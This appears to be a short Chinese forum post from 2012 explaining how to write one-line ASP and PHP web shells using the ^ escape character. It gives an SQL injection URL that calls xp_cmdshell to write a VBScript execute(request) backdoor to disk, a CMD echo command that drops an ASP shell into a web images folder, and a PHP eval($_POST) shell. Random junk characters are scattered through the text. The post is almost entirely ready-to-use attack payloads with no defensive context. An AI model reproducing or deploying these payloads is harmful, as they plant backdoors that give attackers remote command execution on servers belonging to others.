用^转义字符来写ASP(一句话木马)文件的方法:
$ K. G' `; ^6 W9 K, i
( A; n) ^3 A* V* U9 ?1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--/ M8 R: d9 O/ F' B$ O
t; r' u& w: y* z7 h0 e2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp
/ }8 o# L3 \6 d7 {# s
, m8 u C1 }9 {# m; L7 h/ R" k. t8 W7 l" m9 n( Y5 ]8 S/ q
PHP) q- U4 G2 O) o* V( P
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对